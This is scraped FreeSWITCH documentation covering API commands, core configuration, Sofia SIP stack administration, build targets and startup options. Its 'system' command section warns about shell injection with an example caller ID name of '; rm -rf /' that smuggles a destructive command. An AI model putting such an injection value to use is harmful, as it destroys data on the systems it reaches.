Miscellaneous Commands bg_system Execute a system command in the background.Usage: bg_system echo Echo input back to the consoleUsage: echo Example:echo This text will appear\nThis text will appear file_exists Tests whether filename exists.file_exists filenameExamples:freeswitch\u0026gt; file_exists /tmp/real_file\ntrue\nfreeswitch\u0026gt; file_exists /tmp/missing_file\nfalseExample dialplan usage:file_exists example\nfile_exists tests whether FreeSWITCH can see the file, but the file may still be unreadable because of restrictive permissions.\nfind_user_xml Checks to see if a user exists. Matches user tags found in the directory, similar to user_exists, but returns an XML representation of the user as defined in the directory (like the one shown in user_exists).Usage: find_user_xml references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user is assigned. list_users Lists Users configured in DirectoryUsage:list_users [group ] [domain ] [user ] [context ]Examples:freeswitch@localhost\u0026gt; list_users group default\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2000|default|192.168.20.73|default|sofia/internal/sip:2000@192.168.20.219:5060|techsupport|B#-Test 2000|20002001|default|192.168.20.73|default|sofia/internal/sip:2001@192.168.20.150:63412;rinstance=8e2c8b86809acf2a|techsupport|Test 2001|20012002|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2002|20022003|default|192.168.20.73|default|sofia/internal/sip:2003@192.168.20.149:5060|techsupport|Test 2003|20032004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2004|2004\n+OKSearch filters can be combined:freeswitch@localhost\u0026gt; list_users group default user 2004\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test
2004|2004\n+OK sched_api Schedule an API call in the future.Usage:sched_api [+@] \u0026lt;group_name\u0026gt; \u0026lt;command_string\u0026gt;[\u0026amp;] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.\u0026lt;group_name\u0026gt; will be the value of \u0026ldquo;Task-Group\u0026rdquo; in generated events. \u0026ldquo;none\u0026rdquo; is the proper value for no group. If set to UUID of channel (example: ${uuid}), task will automatically be unscheduled when channel hangs up.\u0026lt;command_string\u0026gt; is the command to execute at the scheduled time.A scheduled task or group of tasks can be revoked with sched_del or unsched_api.You could append the \u0026ldquo;\u0026amp;\u0026rdquo; symbol to the end of the line to executed this command in its own thread.Example:sched_api +1800 none originate sofia/internal/1000%${sip_profile} \u0026amp;echo()sched_api @600 check_sched log Periodic task is running\u0026hellip;sched_api +10 ${uuid} chat verto|fs@mydomain.com|1000@mydomain.com|Hello World sched_broadcast Play a file to a specific call in the future.Usage:sched_broadcast [[+]|@time] [aleg|bleg|both]Schedule execution of an application on a chosen leg(s) with optional hangup:sched_broadcast [+] app[![hangup_cause]]::args [aleg|bleg|both] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. 
If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.Examples:sched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e commercial.wav bothsched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleg sched_del Removes a prior scheduled group or task IDUsage:sched_del \u0026lt;group_name|task_id\u0026gt;The one argument can either be a group of prior scheduled tasks or the returned task-id from sched_api.sched_transfer, sched_hangup and sched_broadcast commands add new tasks with group names equal to the channel UUID. Thus, sched_del with the channel UUID as the argument will remove all previously scheduled hangups, transfers and broadcasts for this channel.Examples:sched_del my_groupsched_del 2 sched_hangup Schedule a running call to hangup.Usage:sched_hangup [+] []sched_hangup +0 is the same as uuid_kill sched_transfer Schedule a transfer for a running call.Usage:sched_transfer [+] [] [] stun Executes a STUN lookup.Usage:stun [:port]Example:stun stun.freeswitch.org system Execute a system command.Usage:system The is passed to the system shell, where it may be expanded or interpreted in ways you don\u0026rsquo;t expect. This can lead to security bugs if you\u0026rsquo;re not careful. For example, the following command is dangerous:If a malicious remote caller somehow sets his caller ID name to \u0026ldquo;; rm -rf /\u0026rdquo; you would unintentionally be executing this shell command:log_caller_name; rm -rf /This would be a Bad Thing. time_test Runs a test to see how bad timer jitter is. It runs the test times if specified, otherwise it uses the default count of 10, and tries to sleep for mss microseconds. 
It returns the actual timer duration along with an average.Usage:time_test [count]Example:time_test 100 5\ntest 1 sleep 100 99test 2 sleep 100 97test 3 sleep 100 96test 4 sleep 100 97test 5 sleep 100 102avg 98 timer_test Runs a test to see how bad timer jitter is. Unlike time_test, this uses the actual FreeSWITCH timer infrastructure to do the timer test and exercises the timers used for call processing.Usage:timer_test \u0026lt;10|20|40|60|120\u0026gt; [\u0026lt;1..200\u0026gt;] [\u0026lt;timer_name\u0026gt;]The first argument is the timer interval.The second is the number of test iterations.The third is the timer name; \u0026ldquo;show timers\u0026rdquo; will give you a list.Example:timer_test 20 3\nAvg: 16.408ms Total Time: 49.269ms\n2010-01-29 12:01:15.504280 [CONSOLE] mod_commands.c:310 Timer Test: 1 sleep 20 92542010-01-29 12:01:15.524351 [CONSOLE] mod_commands.c:310 Timer Test: 2 sleep 20 200422010-01-29 12:01:15.544336 [CONSOLE] mod_commands.c:310 Timer Test: 3 sleep 20 19928 tone_detect Start Tone Detection on a channel.Usage:tone_detect \u0026lt;tone_spec\u0026gt; [ ] is required when this is executed as an api call; as a dialplan app the uuid is implicit as part of the channel variables is an arbitrary name that identifies this tone_detect instance; required\u0026lt;tone_spec\u0026gt; frequencies to detect; required \u0026lsquo;r\u0026rsquo; or \u0026lsquo;w\u0026rsquo; to specify which direction to monitor duration during which to detect tones;0 = detect forever+time = number of milliseconds after tone_detect is executedtime = absolute time to stop in seconds since The Epoch (1 January, 1970) FS application to execute when tone_detect is triggered; if app is omitted, only an event will be returned arguments to application enclosed in single quotes the number of times tone_detect should be triggered before executing the specified appOnce tone_detect returns a result, it will not trigger again until reset. 
Reset tone_detect by calling tone_detect with no additional arguments to reactivate the previously specified tone_detect declaration.See also http://wiki.freeswitch.org/wiki/Misc._Dialplan_Tools_tone_detect unsched_api Unschedule a previously scheduled API command.Usage:unsched_api \u0026lt;task_id\u0026gt; url_decode Usage:url_decode url_encode Url encode a string.Usage:url_encode user_data Retrieves user information (parameters or variables) as defined in the FreeSWITCH user directory.Usage:user_data @ \u0026lt;attr|var|param\u0026gt; is the user\u0026rsquo;s id is the user\u0026rsquo;s domain\u0026lt;attr|var|param\u0026gt; specifies whether the requested data is contained in the \u0026ldquo;variables\u0026rdquo; or \u0026ldquo;parameters\u0026rdquo; section of the user\u0026rsquo;s record is the name (key) of the variable to retrieveExamples:user_data 1000@192.168.1.101 param passwordwill return a result of 1234, anduser_data 1000@192.168.1.101 var accountcodewill return a result of 1000 from the example user shown in user_exists, anduser_data 1000@192.168.1.101 attr idwill return the user\u0026rsquo;s actual alphanumeric ID (i.e. \u0026ldquo;john\u0026rdquo;) when number-alias=\u0026ldquo;1000\u0026rdquo; was set as an attribute for that user. user_exists Checks to see if a user exists. 
Matches user tags found in the directory and returns either true/false:Usage:user_exists references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user belongsExample:user_exists id 1000 192.168.1.101will return true where there exists in the directory a user with a key called id whose value equals 1000:User Directory EntryIn the above example, we also could have tested for randomvar:user_exists randomvar 45 192.168.1.101And we would have received the same true result, but:user_exists accountcode 1000 192.168.1.101oruser_exists vm-password 1000 192.168.1.101Would have returned false.\n","permalink":"https://wdd.js.org/freeswitch/mod-command/","summary":"Usage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for.","title":"mod_commands"},{"content":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application. 
What this means is if you set this to something other than DEBUG, no matter what log level you set the console to once you start up, you will not be able to get any log messages below the level you set. Also be careful of mis-typing a log level, if the log level is not correct it will default to a hard_log_level of 0. This means that virtually no log messages will show up anywhere. Core parameters core-db-dsn Allows use of an ODBC database instead of sqlite3 for the FreeSWITCH core.Syntaxdsn:user:pass max-db-handles Maximum number of simultaneous DB handles open db-handle-timeout Maximum number of seconds to wait for a new DB handle before failing disable-monotonic-timing (bool) disables monotonic timer/clock support if it is broken on your system. enable-use-system-time Enables FreeSWITCH to use system time. initial-event-threads Number of event dispatch threads to allocate in the core. Default is 1.If you see the WARNING \u0026ldquo;Create additional event dispatch thread\u0026rdquo; on a heavily loaded server, you could increase the number of threads to prevent the system from falling behind. loglevel amount of detail to show in log max-sessions limits the total number of concurrent channels on your FreeSWITCH™ system. sessions-per-second throttling mechanism, the switch will only create this many channels at most, per second. rtp-start-port RTP port range begin rtp-end-port RTP port range end Variables Variables are default channel variables set on each channel automatically.
Example config ","permalink":"https://wdd.js.org/freeswitch/xml-config/","summary":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application.","title":"XML Switch Configuration"},{"content":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint. Endpoint A FreeSWITCH endpoint represents a full user agent and controls the signaling protocol and media streaming necessary to process calls. The endpoint is analogous to a physical VoIP telephone sitting on your desk. It speaks a particular protocol such as SIP or Verto, to the outside world and interprets that for the FreeSWITCH core. Configuration Files sofia.conf.xml contains the configuration settings for mod_sofiaSee Sofia Configuration Files. SIP profiles See SIP profiles section in Configuring FreeSWITCH. What if these commands don\u0026rsquo;t work for me? Make sure that you are not running another SIP server at the same time as FreeSWITCH. It is not always obvious that another SIP server is running. 
If you type in Sofia commands such as \u0026lsquo;sofia status profile default\u0026rsquo; and it doesn\u0026rsquo;t work then you may have another SIP server running. Stop the other SIP server and restart FreeSWITCH.On Linux, you may wish to try, as a superuser (often \u0026ldquo;root\u0026rdquo;):netstat -lunp | less# -l show listeners, -u show only UDP sockets,# -n numeric output (do not translate addresses or UDP port numbers)# -p show process information (PID, command). Only the superuser is allowed to see this infoWith the less search facility (usually the keystroke \u0026ldquo;/\u0026rdquo;), look for :5060 which is the usual SIP port.To narrow the focus, you can use grep. In the example configs, port 5060 is the \u0026ldquo;internal\u0026rdquo; profile. Try this:netstat -lnp | grep 5060See if something other than FreeSWITCH is using port 5060. Sofia Recover sofia recoverYou can ask Sofia to recover calls that were up, after crashing (or other scenarios).Sofia recover can also be used, if your core db uses ODBC to achieve HA / failover.For FreeSWITCH HA configuration, see Freeswitch HA. Flushing and rebooting registered endpoints You can flush a registration or reboot a specific registered endpoint by issuing a flush_inbound_reg command from the console.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; flush_inbound_reg [\u0026lt;call_id\u0026gt;|user@host] [reboot]If you leave out \u0026lt;call_id\u0026gt; and/or user@host, you will flush/reboot every registered endpoint on a profile.\nNote: For Polycom phones, this command causes the phone to check its configuration from the server. If the file is different (you may add extra space at the end of file), the phone will reboot. You should not change the value of voIpProt.SIP.specialEvent.checkSync.alwaysReboot=\u0026ldquo;0\u0026rdquo; to \u0026ldquo;1\u0026rdquo; in sip.cfg as that allows a potential DoS attack on the phone.
You can also use the check_sync command:sofia profile \u0026lt;profile_name\u0026gt; check_sync \u0026lt;call_id\u0026gt; | user@domain\nNote: The polycom phones do not reload -directory.xml configuration in response to either of these commands, they only reload the configuration. If you want new speed dials to take effect, you\u0026rsquo;ll need to do a full reboot of the phone or enable the alwaysReboot option. (Suggestions from anyone with more detailed PolyCom knowledge would be appreciated here.) Starting a new profile If you have created a new profile you need to start it from the console:freeswitch\u0026gt; sofia profile \u0026lt;new_profile_name\u0026gt; start Reloading profiles and gateways You can reload a specific SIP profile by issuing a rescan/restart command from the consolefreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; [|] reloadxmlThe difference between rescan and restart is that rescan will just load new config and not stop FreeSWITCH from processing any more calls on a profile.** Some config options like IP address and (UDP) port are not reloaded with rescan.** Deleting gateways You can delete a specific gateway by issuing a killgw command from the console. If you use all as gateway name, all gateways will be killedfreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt; Restarting gateways You can force a gateway to restart ( good for forcing a re-registration or similar ) by issuing a killgw command from the console followed by a profile rescan. This is safe to perform on a profile that has active calls.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; rescan Adding / Changing Existing Gateways It will be assumed that you have all your gateways in the /usr/local/freeswitch/conf/sip_profiles/external directory and that you have just created a new entry. 
You can add a new gateway to FreeSWITCH by issuing a rescan reloadxml command from the console as seen in the example below. This will load the newly created gateway and not affect any calls that are currently up.freeswitch\u0026gt; sofia profile external rescan reloadxml\nYou now realize that you have screwed up the IP address in the new gateway and need to change it. So you edit your gateway file and make any changes that you want. You will then need to issue the following commands to destroy the gateway, and then have FreeSWITCH reload the changes without affecting any existing calls that are currently up.\nfreeswitch\u0026gt; sofia profile external killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile external rescan reloadxml View SIP Registrations You can view all the devices that have registered by running the following from the console.freeswitch\u0026gt; sofia status profile regfreeswitch\u0026gt; sofia status profile default regfreeswitch\u0026gt; sofia status profile outbound regYou can also use the xmlstatus key to retrieve statuses in XML format. This is especially useful if you are using mod_xml_rpc.Commands are as follows:freeswitch\u0026gt; sofia xmlstatus profile regfreeswitch\u0026gt; sofia xmlstatus profile default regfreeswitch\u0026gt; sofia xmlstatus profile outbound reg List the status of gateways For the gateways that are in-service:freeswitch\u0026gt; sofia profile gwlist upFor the gateways that are out-of-service:freeswitch\u0026gt; sofia profile gwlist downNotes:\nIt should be used together with . See Sofia_Configuration_Files It can also be used to feed into mod distributor to exclude dead gateways.
List gateway data To retrieve the value of an inbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ivar To retrieve the value of an outbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ovar To retrieve the value of either use:sofia_gateway_data \u0026lt;gateway_name\u0026gt; var This first checks for an inbound variable, then checks for an outbound variable if there\u0026rsquo;s no matching inbound. View User Presence Data Displays presence data from registered devices as seen by the serverUsage:sofia_presence_data [list|status|rpid|user_agent] [profile/]@domainsofia_presence_data list */2005status|rpid|user_agent|network_ip|network_portAway|away|Bria 3 release 3.5.1 stamp 69738|192.168.20.150|21368+OK\nIt\u0026rsquo;s possible to retrieve only one valuesofia_presence_data status */2005Away\nYou can use this value in the dialplan, e.g. Debugging Sofia-SIP The Sofia-SIP components can output various debugging information. The detail of the debugging output is determined by the debugging level. The level is usually module-specific and it can be modified by a module-specific environment variable.
There is also a default level for all modules, controlled by environment variable SOFIA_DEBUG.The environment variables controlling the logging and other debug output are as follows:- SOFIA_DEBUG Default debug level (0..9)- NUA_DEBUG User Agent engine (nua) debug level (0..9)- SOA_DEBUG SDP Offer/Answer engine (soa) debug level (0..9)- NEA_DEBUG Event engine (nea) debug level (0..9)- IPTSEC_DEBUG HTTP/SIP authentication module debug level (0..9)- NTA_DEBUG Transaction engine debug level (0..9)- TPORT_DEBUG Transport event debug level (0..9)- TPORT_LOG If set, print out all parsed SIP messages on transport layer- TPORT_DUMP Filename for dumping unparsed messages from transport- SU_DEBUG su module debug level (0..9)The defined debug output levels are:- 0 SU_DEBUG_0() - fatal errors, panic- 1 SU_DEBUG_1() - critical errors, minimal progress at subsystem level- 2 SU_DEBUG_2() - non-critical errors- 3 SU_DEBUG_3() - warnings, progress messages- 5 SU_DEBUG_5() - signaling protocol actions (incoming packets, \u0026hellip;)- 7 SU_DEBUG_7() - media protocol actions (incoming packets, \u0026hellip;)- 9 SU_DEBUG_9() - entering/exiting functions, very verbatim progressStarting with 1.0.4, those parameters can be controlled from the console by doingfreeswitch\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9]\u0026ldquo;all\u0026rdquo; Will change every component\u0026rsquo;s loglevelA log level of 0 turns off debugging, to turn them all off, you can dofreeswitch\u0026gt; sofia loglevel all 0To report a bug, you can turn on more verbose debugging:sofia global siptrace onsofia loglevel all 9sofia tracelevel alertconsole loglevel debugfsctl debug_level 10 Debugging presence and SLA As of Jan 14, 2011, sofia supports a new debugging command: sofia global debug. It can turn on debugging for SLA, presence, or both.
Usage is:sofia global debug slasofia global debug presencesofia global debug noneThe first two enable debugging SLA and presence, respectively. The third one turns off SLA and/or presence debugging. Sample Export (Linux/Unix) Alternatively, the levels can also be read from environment variables. The following bash commands turn on all debugging levels, and are equivalent to \u0026ldquo;sofia loglevel all 9\u0026rdquo;export SOFIA_DEBUG=9export NUA_DEBUG=9export SOA_DEBUG=9export NEA_DEBUG=9export IPTSEC_DEBUG=9export NTA_DEBUG=9export TPORT_DEBUG=9export TPORT_LOG=9export TPORT_DUMP=/tmp/tport_sip.logexport SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. For example:unset TPORT_LOG Sample Set (Windows) The following commands turn on all debugging levels.set SOFIA_DEBUG=9set NUA_DEBUG=9set SOA_DEBUG=9set NEA_DEBUG=9set IPTSEC_DEBUG=9set NTA_DEBUG=9set TPORT_DEBUG=9set TPORT_LOG=9set TPORT_DUMP=/tmp/tport_sip.logset SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset.
For example:set TPORT_LOG=You can also control SIP Debug output within fs_cli, the FreeSWITCH client app.freeswitch\u0026gt; sofia profile siptrace on|offOn newer software release, you can now be able to issue siptrace for all profiles:sofia global siptrace [on|off]\nTo have the SIP Debug details put in the /usr/local/freeswitch/log/freeswitch.log file, usefreeswitch\u0026gt; sofia tracelevel info (or any other loglevel name or number)To have the SIP details put into the log file automatically on startup, add this to sofia.conf.xml:\u0026lt;global_settings\u0026gt;\u0026hellip;\u0026hellip;\u0026lt;/global_settings\u0026gt;\nand the following to the sip profile xml file:\u0026hellip;\u0026hellip;\u0026hellip;\u0026hellip;\nProfile Configurations Track Call ACL You can restrict access by IP address for either REGISTERs or INVITEs (or both) by using the following options in the sofia profile.See ACL for other access controlsSee acl.conf.xml for list configuration Disabling Hold Disable all calls on this profile from putting the call on hold:\nSee also: rtp_disable_hold variable Using A Single Domain For All Registrations You can force all registrations in a particular profile to use a single domain. In other words, you can ignore the domain in the SIP message. You will need to modify several sofia profile settings. challenge realm auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. 
force-register-domain Preference Weight Transport Port Address================================================================================1 0.500 udp 5060 74.51.38.151 0.500 tcp 5060 74.51.38.15 Flushing Inbound Registrations From time to time, you may need to kill a registration.You can kill a registration from the CLI, or anywhere that accepts API commands with a command similar to the following:sofia profile \u0026lt;profile_name_here\u0026gt; flush_inbound_reg [optional_callid] Dial out of a gateway Basic form:sofia/gateway//\u0026lt;number_to_dial\u0026gt;Example 1:sofia/gateway/asterlink/18005551212gateway: is a keyword and not a \u0026ldquo;gateway\u0026rdquo; name. It has special meaning and tells the stack which credentials to use when challenged for the call. is the actual name of the gateway through which you want to send the call\nYour available gateways (usually configured in conf/sip_profiles/external/*.xml) will show up in sofia status:freeswitch#\u0026gt; sofia status\nName Type Data State=================================================================================================default profile sip:mod_sofia@2.3.4.5:5060 RUNNING (2)mygateway gateway sip:username@1.2.3.4 NOREGphonebooth.example.com alias default ALIASED=================================================================================================1 profile 1 alias Modifying the To: header You can override the To: header by appending ^.Example 1:sofia/foo/user%192.168.1.1^101@$${domain}\nSpecifying SIP Proxy With fs_path You can route a call through a specific SIP proxy by using the \u0026ldquo;fs_path\u0026rdquo; directive. 
Example:sofia/foo/user@that.domain;fs_path=sip:proxy.this.domain Safe SIP URI Formatting As of commit https://freeswitch.org/stash/projects/FS/repos/freeswitch/commits/76370f4d1767bb0dcf828a3d6cde6e015b2cfa03 the User part of the SIP URI has been \u0026ldquo;safely\u0026rdquo; encoded in the case where spaces or other special characters appear.\nChannel Variables Adding Request Headers You can add arbitrary headers to outbound SIP calls by prefixing the string \u0026lsquo;sip_h_\u0026rsquo; to any channel variable, for example:Note that for BYE requests, you will need to use the prefix \u0026lsquo;sip_bye_h_\u0026rsquo; on the channel variable.\nWhile not required, you should prefix your headers with \u0026ldquo;X-\u0026rdquo; to avoid issues with interoperability with other SIP stacks.All inbound SIP calls will install any X- headers into local variables.This means you can easily bridge any X- header from one FreeSWITCH instance to another.To access the header above on a 2nd box, use the channel variable ${sip_h_X-Answer}It is important to note that the syntax ${sip_h_custom-header} can\u0026rsquo;t be used to retrieve any custom header not starting with X-.It is because Sofia only reads and puts into variables custom headers starting with X-.\nAdding Response Headers There are three types of response header prefixes that can be set:\nResponse headersip_rh_ Provisional response headersip_ph_ Bye response headersip_bye_h_ Each prefix will exclusively add headers for their given types of requests - there is no \u0026ldquo;global\u0026rdquo; response header prefix that will add a header to all response messages.For example:\nAdding Custom Headers For instance, you may need P-Charge-Info to append to your INVITE header, you may do as follows:Then, you would see it in SIP message:INVITE sip:19099099099@1.2.3.4 SIP/2.0Via: SIP/2.0/UDP 5.6.7.8:5080;rport;branch=z9hG4bKyg61X9v3gUD4gMax-Forwards: 69From: \u0026ldquo;DJB\u0026rdquo; 
sip:2132132132@5.6.7.8;tag=XQKQ322vQF5gKTo: sip:19099099099@1.2.3.4Call-ID: b6c776f6-47ed-1230-0085-000f1f659e58CSeq: 30776798 INVITEContact: sip:mod_sofia@5.6.7.8:5080User-Agent: FreeSWITCH-mod_sofia/1.2.0-rc2+git~20120713T162602Z~0afd7318bd+unclean~20120713T184029ZAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, UPDATE, INFO, REGISTER, REFER, NOTIFYSupported: timer, precondition, path, replacesAllow-Events: talk, hold, conference, referContent-Type: application/sdpContent-Disposition: sessionContent-Length: 229P-Charge-Info: sip:2132132132@5.6.7.8;npi=0;noa=3X-FS-Support: update_display,send_info.Remote-Party-ID: \u0026ldquo;DJB\u0026rdquo; sip:2132132132@5.6.7.8;party=calling;screen=yes;privacy=off Strip Individual SIP Headers Sometimes a SIP provider will add extra header information. Most of the time they do that for their own use (tracking calls). But that extra information can cause a lot of problems. For example: I get a call from the PSTN via a DID provider (provider1). Since I\u0026rsquo;m not in the office the call gets bridged to my cell phone (provider2). Provider1 adds extra information to the SIP packet as displayed below:X-voipnow-did: 01234567890X-voipnow-extension: 987654321\u0026hellip;In some scenarios, when we bridge this call directly to provider2 the calls get dropped since provider2 doesn\u0026rsquo;t accept the X-voipnow header, so we have to strip off those SIP headers.To strip them off, use the application UNSET in the dialplan (the inverse of SET):\u0026hellip; Strip All custom SIP Headers If you wish to strip all custom headers while keeping only those defined in dialplan:\u0026hellip; Additional Channel variables Additional variables may also be set to influence the way calls are handled by sofia.For example, contacts can be filtered by setting the \u0026lsquo;sip_exclude_contact\u0026rsquo; variable. 
Example:Or you can perform SIP Digest authorization on outgoing calls by setting sip_auth_username and sip_auth_password variables to avoid using Gateways to authenticate. Example:Changing the SIP Contact user FreeSWITCH normally uses mod_sofia@ip:port for the internal SIP contact. To change this to foo@ip:port, there is a variable, sip_contact_user:{sip_contact_user=foo}sofia/my_profile/1234@192.168.0.1;transport=tcp sip_renegotiate_codec_on_reinvite true|false sip_recovery_break_rfc true|false Transcoding Issues G729 and G723 will not let you transcode because of licensing issues. Calls will fail if for example originating endpoint has set G729 with higher priority and receiving endpoint has G723 with highest priority. The logic is to fail the call rather than attempt to find a codec match. If you are having issues due to transcoding you may disable transcoding and both endpoints will negotiate the compatible codec rather than just fail the call.disable-transcoding will take the preferred codec from the inbound leg of your call and only offer that codec on the outbound leg.Add the following command along with to your sofia profile\nExample:\nCustom Events The following are events that can be subscribed to via Event Socket\nRegistration sofia::register* sofia::pre_register* sofia::register_attempt* sofia::register_failure* sofia::unregister - explicit unregister calls* sofia::expire - when a user registration expires Gateways sofia::gateway_add* sofia::gateway_delete* sofia::gateway_state - when a gateway is detected as down or back up Call recovery sofia::recovery_send* sofia::recovery_recv* sofia::recovery_recovered Other sofia::notify_refer* sofia::reinvite* sofia::error FAQ Does it use UDP or TCP? 
By default it uses both, but you can add ;transport=tcp to the Sofia URL to force it to use TCP.For example:sofia/profile/foo@bar.com;transport=tcpAlso there is a parameter in the gateway config:That will cause it to use the TCP transport for the registration and all subsequent SIP messages.Not sure if this is needed or what it does, but the following can also be used in gateway settings:\n","permalink":"https://wdd.js.org/freeswitch/sofia-stack/","summary":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint.","title":"Sofia SIP Stack"},{"content":" make clean - Cleans the build environment make current - Cleans build environment, performs a git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration. This will instead make the default extensions and dialplan to run the basic configuration of FreeSWITCH. ","permalink":"https://wdd.js.org/freeswitch/compile-fs/","summary":"make clean - Cleans the build environment make current - Cleans build environment, performs a git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. 
Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration.","title":"编译FS"},{"content":"\n运行fs 前台运行 freeswitch 后台运行 freeswitch -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source\nFile locations -base [basedir] \u0026ndash; alternate prefix directory-conf [confdir] \u0026ndash; alternate 
directory for FreeSWITCH configuration files-log [logdir] \u0026ndash; alternate directory for logfiles-run [rundir] \u0026ndash; alternate directory for runtime files-db [dbdir] \u0026ndash; alternate directory for the internal database-mod [moddir] \u0026ndash; alternate directory for modules-htdocs [htdocsdir] \u0026ndash; alternate directory for htdocs-scripts [scriptsdir] \u0026ndash; alternate directory for scripts-temp [directory] \u0026ndash; alternate directory for temporary files-grammar [directory] \u0026ndash; alternate directory for grammar files-recordings [directory] \u0026ndash; alternate directory for recordings-storage [directory] \u0026ndash; alternate directory for voicemail storage-sounds [directory] \u0026ndash; alternate directory for sound filesIf you set the file locations of any one of -conf, -log, or -db you must set all three. File Paths A handy method to determine where FreeSWITCH™ is currently looking for files (in linux):Method for showing FS paths\nbash\u0026gt; fs_cli -x \u0026#39;global_getvar\u0026#39;| grep _dir 